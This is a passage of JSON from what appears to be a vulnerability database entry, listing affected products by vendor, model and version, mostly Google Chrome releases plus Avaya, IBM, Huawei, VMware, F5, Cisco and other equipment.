"version": "8.0.552.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.540.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.57" }, { "model": "system storage san384b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-192" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "67000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.46" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1004.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.136" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.821.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.1" }, { "model": "studio", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.492.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.33" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57550" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.948.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.114" }, { "model": "rack server rh2288h v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1024.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.784.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.48" }, { "model": "oceanstor css v100r001c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.30" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.44" }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.80" }, { "model": "system storage san06b-r 2498-r06", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "business service automation essentials", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.16" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.16" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.90" }, { "model": "fusionmanager v100r003c10cp6001", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified presence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.2" }, { "model": "secureplatform r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia embedded r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.92" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.683.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.425.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.486.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.747.0" }, { "model": "oceanstor vis6600t v200r003c10spc100", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.333" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.9" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.2" }, { "model": "studio beta", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "qradar risk manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storefabric b-series switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.17" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.42" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mxe series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1028" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.33" }, { "model": "vcloud automation center", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.773.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.26" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "oceanstor s5800t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.10" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.157" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.739.0" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.19" }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.27" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491059" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "ios-xe for csr1000v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.159.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18" }, { "model": "oceanstor sns5120 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1028.0" }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1013" }, { "model": "espace vcn3000 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.0" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1" }, { "model": "e9000 chassis v100r001c00spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vcenter server appliance update b", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.0" }, { "model": "cloud services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.16" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.660.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.41" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.1" }, { "model": "secure access remote access concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.0" }, { "model": "usc invicta series autosupport portal", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.16" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.321.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.14" }, { "model": "secureplatform r71.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.48" }, { "model": "nexus switch for nexus series 5.0 u1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v3000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.62" }, { "model": "fusionaccess v100r005c10spc203", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.861.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.524.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.717.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.880.0" }, { "model": "oceanstor s2600t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.607.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.471.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.61" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.59" }, { "model": "gaia embedded r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.37" }, { "model": "oceanstor cse v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.232" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.58" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.778.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.74" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.03" }, { "model": "protectier entry edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "horizon daas platform", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.655.0" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.579.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.0" }, { "model": "oceanstor s5600t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.694.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.669.0" }, { "model": "ds8000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.97" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "gaia embedded r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "visualization fault and performance manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "gtsoftx3000 v200r001c01sph106", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.190.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.05.00" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.400.0" }, { "model": "vertica", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.0" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.74" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.592.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.26" }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "storeever esl e-series tape library", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.902.0" }, { "model": "telepresence multipoint switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "ipso r70.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "oceanstor s3900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ipso r77.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "ip deskphones", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.39" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.0" }, { "model": "fusionstorage dsware v100r003c02spc201", "scope": null, "trust": 